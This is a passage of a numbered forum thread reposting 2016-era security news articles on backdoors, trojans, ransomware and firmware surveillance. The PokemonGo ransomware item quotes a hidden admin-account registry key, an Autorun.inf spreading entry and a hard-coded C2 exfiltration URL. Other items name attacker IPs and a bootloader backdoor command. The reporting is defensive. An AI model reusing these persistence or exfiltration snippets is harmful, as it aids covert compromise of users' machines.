  11. Website spreading Gatak-infected keygens (via Symantec) Websites offering free keygens for various enterprise software applications are helping crooks spread the Gatak malware, which opens backdoors on infected computers and facilitates attacks on a company's internal network, or the theft of sensitive information. Gatak is a backdoor trojan that first appeared in 2012. Another name for this threat is Stegoloader, and its main distinctive feature is its ability to communicate with its C&C servers via steganography. Gatak relies on steganography to stain hidden Steganography is the technique of hiding data in plain sight. In the world of cyber-security, steganography is the practice of hiding malicious code, commands, or malware configuration data inside PNG or JPG images. The malware, in this case Gatak, connects to its online C&C server and requests new commands. Instead of receiving an HTTP network requests, for which all security software knows to be on the lookout, the data is sent as an innocuous image, which looks like regular web traffic. The malware reads the image's hidden data and executes the command, all while the local antivirus thinks the user has downloaded an image off the Internet. Keygens for enterprise software spreading Gatak Security firm Symantec says it uncovered a malware distribution campaign that leverages a website offering free keygens for various applications such as: SketchList3D - woodworking design software Native Instruments Drumlab - sound engineering software BobCAD-CAM - metalworking/manufacturing software BarTender Enterprise Automation - label and barcode creation software HDClone - hard disk cloning utility Siemens SIMATIC STEP 7 - industrial automation software CadSoft Eagle Professional - printed circuit board design software PremiumSoft Navicat Premium - database administration software Originlab Originpro - data analysis and graphing software Manctl Skanect - 3D scanning software Symantec System Recovery - backup and data recovery software All of the above are specialized apps, deployed in enterprise environments. The group behind this campaign is specifically targeting users that use these applications at work, but without valid licenses, in the hopes of infecting valuable targets they could hack, steal data from, and possibly sell it on the underground. Keygens don't work, they just infect users with Gatak The keygens distributed via this website aren't even fully-working tools. They just produce a random string of characters, but their purpose is to trick the user into executing the keygen binary just once, enough to infect the victim. The hackers are picky about the companies they target because the security firm has seen second-stage attacks on only 62% of all infected computers. Attackers use Gatak to gather basic information about targets, on which, if they deem valuable, deploy other malware at later stages. In some cases, the hackers also resort to lateral movement on the victim's network, with the attackers manually logging into the compromised PC. Attacks aren't sophisticated, and the hackers only take advantage of weak passwords inside the local network. Symantec says it didn't detect any zero-days or automated hacking tools employed when hackers have attempted to infect other devices on the local network. Gatak infections per industry vertical (via Symantec) Telemetry data shows that 62% of all Gatak infections have been found on computers on enterprise networks. Most of these attacks have targeted the healthcare sector, but it doesn't appear that hackers specifically targeted this industry vertical, as other companies in other verticals were also hit. Attackers might have opted to focus more on healthcare institutions because these organizations usually store more in-depth user data they can steal, compared to the automotive industry, gambling, education, construction, or others. "In some cases, the attackers have infected computers with other malware, including various ransomware variants and the Shylock financial Trojan," Symantec notes in a report. "They may be used by the group when they believe their attack has been uncovered, in order to throw investigators off the scent." Article source
  12. Seriously, you cannot trust anyone these days SECURITY COMPANY Proofpoint has discovered that some bastard blaggards are using the medium of Youtube to sell phishing software to people, and then exploiting those people. It makes you wonder if you can trust anyone these days? If you cannot trust someone who sells something that is designed to steal from people not to steal from you, who can you trust not to steal from you? In the short term, let's assume that we can trust Proofpoint. Proofpoint is pretty upset about its discovery and disappointed to see old hacking techniques making their way onto cats jumping onto things and monkeys sniffing things site YouTube. We guess we should all share its disappointment. Even those of us that have neither sought nor bought a phishing kit on the internet. "Like most other businesses, cybercriminals look for ways to market and distribute their tools effectively while staying under the radar of law enforcement and the security community. Recently, Proofpoint researchers have observed scammers distributing phishing templates and kits via YouTube, complete with how-to videos and links in the video descriptions to the software. In fact, this practice appears to be quite widespread. A simple search for "paypal scama" returns over 114,000 results," said the firm. "There's a catch, though, for criminals downloading the software: a backdoor sends the phished information back to the author. While backdoors on these templates aren't new, the use of YouTube to advertise and distribute them is a new trend." It is not that new though, Proofpoint says that some of the videos have been on YouTube for a few months now, and that this suggests that Youtube does not have anything that automatically scans for this kind of caper. The last laugh is on the original poster because ultimately everything comes back to him, or her. The victims are the victims that have fallen foul of schemes to rob them via Amazon and eBay and other online merchants. Obviously. "Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software," concludes Proofpoint. "At the same time, the old adage of ‘honor among thieves' should be taken with a grain of salt, since multiple samples revealed authors including backdoors to harvest phished credentials even after new phishing actors purchased the templates for use in their own campaigns. The real losers in these transactions, though, are the victims who have their credentials stolen by multiple actors every time the kits are used." Article source
  13. In “mistake,” AdUps collected data from BLU Android phones in US. The BLU R1 HD is one of the devices that was backdoored by a Chinese software provider. Security firm Kryptowire has uncovered a backdoor in the firmware installed on low-cost Android phones, including phones from BLU Products sold online through Amazon and Best Buy. The backdoor software, initially discovered on the BLU R1 HD, sent massive amounts of personal data about the phones and their users’ activities back to servers in China that are owned by a firmware update software provider. The data included phone number, location data, the content of text messages, calls made, and applications installed and used. The company, Shanghai AdUps Technologies, had apparently designed the backdoor to help Chinese phone manufacturers and carriers track the behavior of their customers for advertising purposes. AdUps claims its software runs updates for more than 700 million devices worldwide, including smartphones, tablets, and automobile entertainment systems. It is installed on smartphones from Huawei and ZTE sold in China. The surveillance feature of the software was developed specifically for the Chinese market, the company says, and was unintentionally included in the software for BLU devices. A lawyer for the company told The New York Times that the data was not being collected for the Chinese government, stating, “This is a private company that made a mistake.” The backdoor was part of the commercial Firmware Over The Air (FOTA) update software installed on BLU Android devices provided as a service to BLU by AdUps. In a report on the finding, a Kryptowire spokesperson said: These devices actively transmitted user and device information including the full-body of text messages, contact lists, call history with full telephone numbers, unique device identifiers including the International Mobile Subscriber Identity (IMSI) and the International Mobile Equipment Identity (IMEI). The firmware could target specific users and text messages matching remotely defined keywords. The firmware also collected and transmitted information about the use of applications installed on the monitored device, bypassed the Android permission model, executed remote commands with escalated (system) privileges, and was able to remotely reprogram the devices... The firmware that shipped with the mobile devices and subsequent updates allowed for the remote installation of applications without the users' consent and, in some versions of the software, the transmission of fine-grained device location information. The transmissions were discovered by Kryptowire in lab testing. The company immediately notified Google, BLU, AdUps, and Amazon—which is the exclusive retailer of the BLU R1 HD—of its findings. The user data was sent in JavaScript Object Notation (JSON) format to a number of servers, all with the hostname bigdata: bigdata.adups.com, bigdata.adsunflower.com, bigdata.adfuture.cn, and bigdata.advmob.cn. The data collection and transmission capability is spread across different applications and files. Text message data (encrypted with DES, which Kryptowire researchers were able to recover the key for) and call log information were sent back every 72 hours. Other data, including location data and app use, was sent every 24 hours. A BLU spokesperson told Ars that the software backdoor affected a “limited number of BLU devices” and that the “affected application has since been self-updated and the functionality verified to be no longer collecting or sending this information.” According to The New York Times report, BLU reported about 120,000 devices were affected and patched. Article source
  14. Microsoft Corp, still stung by accusations that it installed "back doors" for the U.S. government to access customers' communications, opened a center in Brazil on Wednesday where officials will be able to inspect its programming code, in an attempt to allay suspicions in the region that its software programs are vulnerable to spying. Behind reinforced walls and with strict security settings, the world's biggest software company showed off its fourth 'Transparency Center' in Brasilia, where experts from Latin American and Caribbean governments will be able to view the source code of its products. The effort to build trust follows heightened suspicions in the region after former U.S. National Security Agency contractor Edward Snowden leaked documents in 2013 that showed the agency was capturing massive amounts of data from emails handled by major U.S. technology companies, including Microsoft. The leak, in addition to another Snowden disclosure that the United States had been spying on communications including those of former Brazilian President Dilma Rousseff, prompted Brazil and other governments around the world to reconsider how much they could trust U.S. technology companies not to install back doors at the request of U.S. intelligence agencies. At the new site, visited on Wednesday by officials including the speaker of Brazil's Congress, no electronics will be allowed into the secure viewing room. Microsoft prevents anyone from copying the massive amount of coding on display - as much as 50 million lines for its email and server products. Viewers inspect copies of source code on computers connected only to local servers and cut off from the internet. The copies are later deleted. Viewers can use software tools to examine the code, Microsoft said, but it was not immediately clear whether experts would be able to run deep code analysis necessary to uncover back doors or other bugs. It is by no means certain the effort by Microsoft will diminish concerns about spying, but Brazil's reaction to the generally secretive software company opening up its code was initially positive. "This center is aimed at showing that there are no traps, it is a good step," a Brazilian government official, who asked not to be named because he was not authorized to speak about cyber security, told Reuters. The Brasilia facility is Microsoft's fourth transparency center after the NSA scandal. It set up the first one at its Redmond, Washington headquarters in the United States in 2014, one in Brussels last year and one in Singapore earlier this month. It will soon open another in Beijing. The centers allow for face-to-face discussions between government experts and developers. "Governments can verify for themselves that there are no back doors," said Mark Estberg, senior director of Microsoft's global government security program. Article source
  15. Pork Explosion backdoor affects Foxconn-made devices Some Android devices that contain firmware created by Foxconn may be vulnerable via a debugging feature left inside the OS bootloader, which acts as a backdoor and bypasses authentication procedures for any intruder with USB access to a vulnerable phone. Foxconn is a Taiwanese company that assembles the electronic parts of several Android smartphone manufacturers (OEMs). The reason this backdoor exists in the bootloader, the piece of code responsible for booting up the Android OS, is because various OEMs allow Foxconn to create and supply firmware for some of the electronics they use to glue all the parts of an Android device together. Foxconn debugging feature acts as a backdoor Jon Sawyer, a US security expert, discovered at the end of August that this firmware included support for booting up Android devices without having to go through the proper authentication procedure. The researcher says that someone with physical access to the device, could connect it via USB to a computer, and use specific software to interact with the device during its boot-up procedure. This kind of software is most likely a Foxconn debugger, but Sawyer was able to craft his own client and run the commands to enter this "factory test mode." This test mode (aka backdoor) can be accessed via Fastboot, a protocol for handling boot-up commands. Sawyer says that the boot-up command to access the backdoor is "reboot-ftm," and can only be sent to the device using custom software, and not through Android or OEM-specific Fastboot interfaces. "While it is obviously a debugging feature, it is a backdoor," Sawyer says, "it isn’t something we should see in modern devices, and it is a sign of great neglect on Foxconn’s part." Backdoor accessible via USB, disables SELinux But it gets even worse. When entering this factory test mode, Sawyer says the user is "root," with total control over the phone, and that SELinux, a major Android security component, is completely disabled. "In short, this is a full compromise over usb, which requires no logon access to the device," Sawyer says. "This vulnerability completely bypasses authentication and authorization controls on the device. It is a prime target for forensic data extraction." "Due to the ability to get a root shell on a password protected or encrypted device, Pork Explosion would be of value for forensic data extraction, brute forcing encryption keys, or unlocking the boot loader of a device without resetting user data. Phone vendors were unaware this backdoor has been placed into their products," Sawyer adds. Unknown number of devices affected This backdoor, which he (weirdly) named Pork Explosion, affects a large number of devices. Unfortunately, there isn't a list of affected OEMs and smartphone models at the time of writing. Sawyer has provided the following information on how to detect Android devices affected by Pork Explosion. Source: http://news.softpedia.com/news/backdoor-discovered-in-some-foxconn-made-android-smartphones-509271.shtml#sgal_0
  16. Researchers warn about the use of standardized or hard-coded primes in existing cryptosystems Researchers warn that many 1024-bit keys used to secure communications on the internet today might be based on prime numbers that have been intentionally backdoored in an undetectable way. Many public-key cryptography algorithms that are used to secure web, email, VPN, SSH and other types of connections on the internet derive their strength from the mathematical complexity of discrete logarithms -- computing discrete logarithms for groups of large prime numbers cannot be efficiently done using classical methods. This is what makes cracking strong encryption computationally impractical. Most key-generation algorithms rely on prime parameters whose generation is supposed to be verifiably random. However, many parameters have been standardized and are being used in popular crypto algorithms like Diffie-Hellman and DSA without the seeds that were used to generate them ever being published. That makes it impossible to tell whether, for example, the primes were intentionally "backdoored" -- selected to simplify the computation that would normally be required to crack the encryption. Researchers from University of Pennsylvania, INRIA, CNRS and Université de Lorraine recently published a paper in which they show why this lack of cryptographic transparency is problematic and could mean that many encryption keys used today are based on backdoored primes without anyone -- aside from those who created them -- knowing. To demonstrate this, the researchers created a backdoored 1024-bit Diffie-Hellman prime and showed that solving the discrete log problem for it is several orders of magnitude easier than for a truly random one. "Current estimates for 1024-bit discrete log in general suggest that such computations are likely within range for an adversary who can afford hundreds of millions of dollars of special-purpose hardware," the researchers said in their paper. "In contrast, we were able to perform a discrete log computation on a specially trapdoored prime in two months on an academic cluster." The problem is that for someone who doesn't know about the backdoor, demonstrating that a prime has been trapdoored in the first place would be nearly impossible. "The near universal failure of implementers to use verifiable prime generation practices means that use of weak primes would be undetectable in practice and unlikely to raise eyebrows." This is conceptually similar to the backdoor found in the Dual_EC random number generator, which is believed to have been introduced by the U.S. National Security Agency. However, that backdoor was much easier to find and, unlike Diffie-Hellman or DSA, Dual_EC never received widespread adoption. Diffie-Hellman ephemeral (DHE) is slowly replacing RSA as the preferred key exchange algorithm in TLS due to its perfect forward secrecy property that's supposed to keep past communications secure even if the key is compromised in the future. However, the use of backdoored primes would defeat that security benefit. Furthermore, 1024-bit keys are still widely used online, despite the U.S. National Institute of Standards and Technology recommending a transition to larger key sizes since 2010. According to the SSL Pulse project, 22 percent of the internet's top 140,000 HTTPS-enabled websites use 1024-bit keys. "Our results are yet another reminder that 1024-bit primes should be considered insecure for the security of cryptosystems based on the hardness of discrete logarithms," the researchers said. "The discrete logarithm computation for our backdoored prime was only feasible because of the 1024-bit size, and the most effective protection against any backdoor of this type has always been to use key sizes for which any computation is infeasible." The researchers estimate that performing similar computations for 2048-bit keys, even with backdoored primes, would be 16 million times harder than for 1024-bit keys and will remain infeasible for many years to come. The immediate solution is to switch to 2048-bit keys, but in the future all standardized primes should be published together with their seeds, the researchers said. Documents leaked in 2013 by former NSA contractor Edward Snowden suggested that the agency has the ability to decrypt a lot of VPN traffic. Last year, a group of researchers speculated that the reason for this was the widespread use in practice of a small number of fixed or standardized groups of primes. "Performing precomputation for a single 1024-bit group would allow passive eavesdropping on 18% of popular HTTPS sites, and a second group would allow decryption of traffic to 66% of IPsec VPNs and 26% of SSH servers," the researchers said in their paper at that time. "A close reading of published NSA leaks shows that the agency’s attacks on VPNs are consistent with having achieved such a break." Article source
  17. Trojan steals app and database passwords, PoS data Log of recent attacks against the RDP port of a honeypot server A new malware family called Trojan.sysscan has the potential to wreak havoc in enterprise networks that feature poorly protected RDP servers. Discovered by security firm Guardicore, attackers utilize this malware as a backdoor trojan, collecting data from compromised hosts, and exfiltrating it to an attacker's remote server. Attacker infects systems after RDP brute-force attacks Targeted systems are infected after the attacker scans the Internet for open RDP ports, which he brute-forces using common username and password combinations. Poorly secured servers are the optimal targets, and because RDP servers are commonly found in medium-to-large enterprise networks, companies have the most to fear from this new threat. According to Guardicore, this new trojan is coded in the Delphi programming language and comes with support for dumping passwords from locally installed applications such as browsers, databases, and PoS software. The trojan contains specific functions to target credentials used for accounts on banking, gambling and tax websites. It will also target and steal browser cookie files. Two IP addresses used in recent attacks The trojan sets up a hidden administrator account on compromised systems in order to gain boot persistence and makes sure to leave the RDP open for future connections. Guardicore says Trojan.sysscan contains code to search and identify when the trojan is executed in sandbox environments and virtual machines. Nevertheless, the trojan only detects the presence of these environments and fails to take any action to stop execution or hide its activity. The data the trojan collects is sent via an unencrypted HTTP request to a remote server. If the transfer fails, often times, the attacker logs in via RDP and copies the data manually. Security experts say that during this recent wave of Trojan.sysscan attacks, the threat actor behind the malware has used two IPs: 85.93.5.43 (UAE) to store the stolen data, and 144.76.137.166 (Germany) to scan for open RDP ports. Article source
  18. Security researcher Pierre Kim has unearthed a bucketload of vulnerabilities affecting the LTE router/portable wireless hotspot D-Link DWR-932. Among these are backdoor accounts, weak default PINs, and hardcoded passwords. Kim went searching for them after he previously poked around some Quanta LTE routers and also found a huge number of flaws, and a D-Link DWR-932 user noted that the two router types have many similarities. In fact, he says that D-Link’s router is based on the Quanta models, and inherited some of the vulnerabilities. The documented D-Link DWR-932 vulnerabilities affect the latest available firmware. Kim first responsibly disclosed them to the D-Link Security Incident Response Team in June, but after the company said early this month that they don’t have a schedule for a firmware release, he decided to go public with the details about some of the flaws. In short, the firmware sports: Two backdoor accounts with easy-to-guess passwords that can be used to bypass the HTTP authentication used to manage the router A default, hardcoded Wi-Fi Protected Setup (WPS) PIN, as well as a weak WPS PIN generation algorithm Multiple vulnerabilities in the HTTP daemon Hardcoded remote Firmware Over The Air credentials Lowered security in Universal Plug and Play, and more. “At best, the vulnerabilites are due to incompetence; at worst, it is a deliberate act of security sabotage from the vendor,” says Kim, and advises users to stop using the device until adequate fixes are provided. “As the router has a sizable memory (168 MB), a decent CPU and good free space (235 MB) with complete toolkits installed by default (sshd, proxy, tcpdump …), I advise users to trash their routers because it’s trivial for an attacker to use this router as an attack vector (ie: hosting a sniffing tool, LAN hacking, active MiTM tool, spamming zombie),” he noted. The router is still being sold and used around the world. Article source
  19. Xiaomi Can Silently Install Any App On Your Android Phone Using A Backdoor Do you own an Android Smartphone from Xiaomi, HTC, Samsung, or OnePlus? If yes, then you must be aware that almost all smartphone manufacturers provide custom ROMs like CyanogenMod, Paranoid Android, MIUI and others with some pre-loaded themes and applications to increase the device's performance. But do you have any idea about the pre-installed apps and services your manufacturer has installed on your device?, What are their purposes? And, Do they pose any threat to your security or privacy? With the same curiosity to find answers to these questions, a Computer Science student and security enthusiast from Netherlands who own a Xiaomi Mi4 smartphone started an investigation to know the purpose of a mysterious pre-installed app, dubbed AnalyticsCore.apk, that runs 24x7 in the background and reappeared even if you delete it. Xiaomi is one of the world's largest smartphone manufacturers, which has previously been criticized for spreading malware, shipping handsets with pre-loaded spyware/adware and forked version of Android OS, and secretly stealing users' data from the device without their permission. Xiaomi Can Silently Install Any App On your Device After asking about the purpose of AnalyticsCore app on company’s support forum and getting no response, Thijs Broenink reverse engineered the code and found that the app checks for a new update from the company's official server every 24 hours. While making these requests, the app sends device identification information with it, including phone's IMEI, Model, MAC address, Nonce, Package name as well as signature. If there is an updated app available on the server with the filename "Analytics.apk," it will automatically get downloaded and installed in the background without user interaction. Now the question is, Does your phone verify the correctness of the APK, and does it make sure that it is actually an Analytics app? Broenink found that there is no validation at all to check which APK is getting installed to user's phone, which means there is a way for hackers to exploit this loophole. This also means Xiaomi can remotely and silently install any application on your device just by renaming it to "Analytics.apk" and hosting it on the server. Hackers Can Also Exploit This Backdoor Since the researcher didn't find the actual purpose of the AnalyticsCore app, neither on Googling nor on the company's website, it is hard to say why Xiaomi has kept this mysterious "backdoor" on its millions of devices. As I previously said: There is no such backdoor that only its creator can access. So, what if hackers or any intelligence agency figure out how to exploit this backdoor to silently push malware onto millions of Xiaomi devices within just 24 hours? Ironically, the device connects and receive updates over HTTP connection, exposing the whole process to Man-in-the-Middle attacks. Even on the Xiaomi discussion forum, multiple users have shown their concerns about the existence of this mysterious APK and its purpose. How to Block Secret Installation? As a temporary workaround, Xiaomi users can block all connections to Xiaomi related domains using a firewall app. No one from Xiaomi team has yet commented on its forum about the question raised by Broenink. We'll update the story as soon as we heard from the company. Meanwhile, if you are a Xiaomi user and has experienced anything fishy on your device, hit the comments below and let us know. Source
  20. Trojan can steal passwords, log keystrokes Two spam email samples spreading the new trojan Bitdefender security researchers say they've uncovered a spam flood spreading booby-trapped Microsoft Publisher (PUB) files laced with a new trojan that opens a backdoor on infected computers. The company says it detected a few thousands of these emails in a short period, all containing .pub files attached to the email messages. The spam itself claimed to come from various brands in the UK and China and tried to pass as orders and invoices. PUB file -> VBScript -> AutoIt script -> Backdoor Trojan The attached PUB file, when opened, would trigger a VBScript that downloads a self-extracting cabinet (CAB) file on the user's PC. This file contains an AutoIt script, a tool for running the AutoIt script, and a file encrypted with the AES-256 algorithm. Bitdefender's team noticed that a string from the AutoIt script serves as the decryption key for the latter file. The encrypted file is actually a backdoor trojan that allows crooks to connect to the infected PC. Trojan can log keystrokes, steal passwords This trojan can also log keystrokes, record passwords as they're typed into login forms, dump passwords from browsers and email clients, gather information about the infected system, and more. Bitdefender's team hasn't bothered naming the malware, which is currently detected only as Generic.Malware.SFLl.545292C. The PUB files spreading the trojan are detected in security alerts as W97M.Downloader.EGF. What's strange about this malware distribution campaign is the usage of PUB files, specific to Microsoft's Publisher application, one of the apps included in the Office 365 suite. ".pub is not your typical file format to host malware," Adrian Miron, Head of Antispam Lab at Bitdefender, says. "Spammers have chosen it because people don’t usually associate this type of file with the possibility of infection." Article source
  21. FBI Director Wants 'Adult Conversation' About Backdooring Encryption Coast's clear, boss, no encryption here ... FBI Director James Comey, center How about f**k off – is that adult enough? FBI Director James Comey is gathering evidence so that in 2017 America can have an "adult" conversation about breaking encryption to make crimefighters' lives easier. Speaking at Tuesday's 2016 Symantec Government Symposium in Washington, Comey banged on about his obsession with strong cryptography causing criminals to "go dark" and making themselves harder to catch. Comey said that once the election cycle is over, he will be resuming his push to force technology companies to bork their own products, and this time armed with plenty of supporting documentation. "The conversation we've been trying to have about this has dipped below public consciousness now, and that's fine. Because what we want to do is collect information this year so that next year we can have an adult conversation in this country," he said, AP reports. "We want to lock some people up, so that we send a message that it's not a freebie to kick in the door, metaphorically, of an American company or private citizen and steal what matters to them. And if we can't lock people up, we want to call (them) out. We want to name and shame through indictments, or sanctions, or public relation campaigns – who is doing this and exactly what they're doing." Americans do have the right to a measure of privacy in their own homes, cars, or on their electronic devices, he said. But the government also has the right to invade that privacy when law enforcement feels it has probable cause. Comey referenced the Apple case, where the FBI tried to force Tim Cook's company to build a version of iOS that could bypass the security systems of an iPhone used by the San Bernardino terrorist. The FBI backed down after a third party proved able to get into the handset, and nothing of note was found on it. But Comey isn't giving up in his quest to introduce a backdoor in encryption systems, or a front door as he prefers to call it. This despite the NSA and the best minds in the crypto business pointing out that it's mathematically impossible to build such an access mechanism that can't be found and exploited by others. Comey, and others, seem to think that it is possible, despite offering no evidence to support this view. Instead they want to force the technology industry to invent a way to make it possible for them to defeat encryption. Even supposing such a system was possible and police got a golden key to crypto, there's no guarantee that the method wouldn't leak out. As we saw with the Microsoft Secure Boot fiasco, even the most sensitive golden keys can leak, and a method to break all American crypto systems would be top of the wish list for criminals and foreign powers. Comey's argument is also predicated on the assumption that criminals will only use American crypto systems. At the last count, two-thirds of the crypto systems out there come from outside the Land of the FreeTM and so would be unaffected. US tech firms are, of course, very worried about law enforcement's plans. If implemented, any backdoor would kill their sales, both domestically and internationally. American technology sales have already suffered post-Snowden and selling broken crypto would accelerate this decline. Source
  22. Backdoor Trojan Uses TeamViewer Components to Spy on PCs in Europe, Russia, US Crooks also delivering keyloggers and password stealers The concept is not new by any means, and crooks employed TeamViewer in the past, when they packaged the legitimate app alongside their malware and used it to transform the user's PC into a web proxy. That particular trojan, BackDoor.TeamViewer.49, did not allow the crooks to steal anything, only to spy on traffic, but this newer variant does, according to Dr.Web security researchers. In fact, the two variants seem to be related because they both use stripped-down versions of the TeamViewer application, where they replace the avicap32.dll file with a malicious version that loads trojan's malicious features. Trojan includes many self-defense mechanisms The infection process revolves around users installing applications, where the stripped-down TeamViewer version is also installed without their knowledge. Whenever this modified TeamViewer version starts, the avicap32.dll is loaded by default, being a must-run DLL. Crooks modified this DLL to include the BackDoor.TeamViewerENT trojan, which gets loaded into the computer's memory, without needing any files on disk to function. This fileless operation mode makes antivirus detection harder. The modified DLL also contains functions to suppress any TeamViewer error messages, a functionality included to avoid giving away the trojan's presence. Another odd feature is that, whenever the user starts the Windows Task Manager or Process Explorer apps, the trojan automatically shuts down (the parent TeamViewer process) to avoid getting seen by the victim in the process list. Backdoor trojan includes lots of RAT-looking features After this, BackDoor.TeamViewerENT.1 begins to behave like a regular backdoor. It starts communicating with its C&C server, from where it receives various types of commands. The trojan includes the ability to restart or turn off the computer, remove or relaunch its parent TeamViewer process, listen to conversations via the microphone, access the webcam, download and execute files, run command-line instructions, or connect to specified remote servers. As you can see, these are full-on RAT features. Additionally, Dr.Web says it detected a campaign where crooks used the trojan to download and install other malware like keyloggers and password stealers. During their investigation, security researchers found the trojan was very active, especially targeting Russian users, but also users in the UK, Spain, and the US. Attackers switched focus to US targets in August, says the security vendor. Some of this trojan's other names are Spy-Agent, TVSPY, TVRAT, or Teamspy. Last week, Kaspersky detected that the criminal group delivering the Shade ransomware also integrated this trojan in their distribution channel. Crooks were using it to spy on infected targets and see if they were valuable targets. Kaspersky says the crooks specifically focused on accounting departments at Russian-speaking companies. TeamViewer, which is a legitimate application, is not the only application that's been abused by cyber-criminals in the past month. The same happened to LogMeIn, another remote desktop utility, which crooks used together with the PosCardStealer PoS malware. The criminal group was hacking into computers that had LogMeIn installed and leaving their PoS malware behind. Source
  23. With the popularity of PokemonGo, it was inevitable that a malware developer would create a ransomware that impersonates it. This is the case with a new Hidden-Tear ransomware discovered by Michael Gillespie that impersonates a PokemonGo application for Windows and targets Arabic victims. PokemonGo Ransomware Icon On first glance, the PokemonGo ransomware infection looks like any other generic ransomware infection. It will scan a victim's drive for files that have the following extensions: .txt, .rtf, .doc, .pdf, .mht, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .jpg, .png, .csv, .sql, .mdb, .sln, .php, .asp, .aspx, .html, .xml, .psd, .htm, .gif, .png When it encrypts a file it will use AES encryption and append the .locked extension to the encrypted file. When done it will display a ransom note that tells the victim to contact [email protected] to get payment instructions. On closer look, it is apparent that this developer has put in extra time to include features that are not found in many, if any, other ransomware variants. These features include adding a backdoor Windows account, spreading the executable to other drives, and creating network shares. It also appears that the developer isn't done yet as the source code contains many indications that this is a development version. New features found in the PokemonGo Ransomware Most ransomware infections encrypt your data, delete itself, and then display a ransom note. The malware developers are there to do one thing; encrypt your files so that you pay the ransom. With this said, most ransomware typically do not want to leave any traces behind other than the ransom notes. The PokemonGo ransomware acts a little differently as it creates a backdoor account in Windows so that the developer can gain access to a victim's computer at a later date. When installed, the PokemonGo Ransomware will create a user account called Hack3r and adds it to the Administrators group. Hack3r Account It then hides this account from being seen on the Windows login screen by configuring the following Windows registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList "Hack3r" = 0 Another feature is that it contains a function that will create a network share on the victim's computer. It is currently unknown what this share will be used for as most shares would be blocked a victim's router or firewall. This function is currently not being used by the program. Create Share Code Last, but not least, the ransomware attempts to spread itself by copying the ransomware executable to all removable drives. It then creates a Autorun.inf file so that the ransomware is run every time someone inserts that removable drive into a computer. The contents of this Autorun.inf file is: [AutoRun] OPEN=PokemonGo.exe ICON=PokemonGo.exe It also copies the executable to the root of any fixed disk other then the C: drive and sets an autorun entry called PokemonGo to start it when a user logs into Windows. The PokemonGo Ransomware is still in Development There are numerous indications that this ransomware is still in development. First, the ransomware is using a static AES key of 123vivalalgerie. It is assumed that when this ransomware goes live, it will generate a random key and upload it to the Command & Control server. Another clue that it is still in development is that the hard coded C2 server uses an IP address that is assigned only for private use. That means that there is no way to connect to the IP address over the Internet. private string targetURL = "http://10.25.0.169/PokemonGo/write.php?info="; This too will change when the ransomware is finally released. Finally, the CreateShare is in the program, but is not actually being used at this time. The PokemonGo Ransomware Targets Arabic Victims This ransomware targets Arabic victims based on the ransom notes and screensaver created by the program. When the ransomware has finished encrypting the files on a computer it will create a ransom note on the Windows Desktop called هام جدا.txt. This translates to Very important.txt. The content of this ransom note is: (: لقد تم تشفير ملفاتكم، لفك الشفرة فلكسي موبيليس للعنوان التالي [email protected] وشكرا على كرمكم مسبقا The English translation is: ( : Your files have been encrypted , decoding Falaksa Mobilis following address [email protected] and thank you in advance for your generosity Finally, when the ransomware is installed it will extract a resource embedded in the main ransomware executable and save it in the victim's Startup folder. This resource is actually another executable that is configured to start automatically when the victim logs into Windows. Once started it will display a screensaver showing Pikachu and another ransom note in Arabic. Screensaver Ransom Note An interesting resource embedded in the screensaver executable is an image (shown below) with the name of Sans Titre. This phrase is French, rather than Arabic, and means Untitled. Could this be a clue for the origin of the developer? Sans Titre Image Files Associated with the PokemonGo Ransomware: %UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[random].exe PokemonGo.exe Registry Entries associated with the PokemonGo Ransomware: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "PokemonGo" Article source
  24. The trojan downloader Nemucod is back with a new campaign. This time however, it has changed the payload served to its victims – ransomware is not its go-to malware. Currently the “weapon of choice” is a backdoor detected by ESET as Win32/Kovter, in this instance mainly focusing on ad-clicking. As a backdoor, this trojan allows the attacker to control the machine remotely without the victim’s consent or knowledge. The currently used variant can perform four main activities: 1. Download and run a file, 2. Gather various information and send it to a C&C server, 3. Store its own configuration data in Windows Registry entries, and 4. Control its own “click-function”. “In the recently observed wave, malware operators are mainly focusing on the ad-clicking capability delivered via an embedded browser.” In the recently observed wave, malware operators are mainly focusing on the ad-clicking capability delivered via an embedded browser. The trojan can activate as many as 30 separate threads, each visiting websites and clicking on ads. The number of threads can change according to commands from the attacker and can also alter them automatically – since Kovter is monitoring free memory and CPU usage. This helps the trojan not to overload the system and keep a low profile. However, when the computer is idle, the malware may allocate more resources to its activities until further user activity is detected. When set in Kovter’s configuration it can also check whether the infected machine runs in a controlled or virtual environment and reports this fact to the attacker. To deliver Kovter, the attackers behind the campaign use the Nemucod downloader disguised as an email ZIP attachment. Posing as a fake invoice, cybercriminals try to convince users to open it (unaware that it contains an infected executable JavaScript file). This technique is used to avoid detection in some mail scanners and to reach as many victims as possible. If the user falls for the trap and executes the infected file – the Nemucod downloader – it downloads Kovter onto the machine and executes it. Similar Nemucod campaigns have been around for quite some time. ESET warned the public of the threat in late December, 2015, and again in March, 2016. However, past waves primarily tried to download ransomware families, most frequently Locky or the now discontinued TeslaCrypt, instead of the current ad-clicking backdoor. How can you avoid this threat? If your email client or server offers attachment blocking by extension, you may want to block emails sent with .EXE, *.BAT, *.CMD, *.SCR and *.JS. files attached Make sure your operating system displays file extensions. This helps to identify the true type of a file in case of dual extension spoofing (e.g. “INVOICE.PDF.EXE” is not displayed as “INVOICE.PDF”). If you frequently and legitimately receive this type of files, check who the sender is and if there is anything suspicious, scan the message and its attachments with reliable security solution. Article source
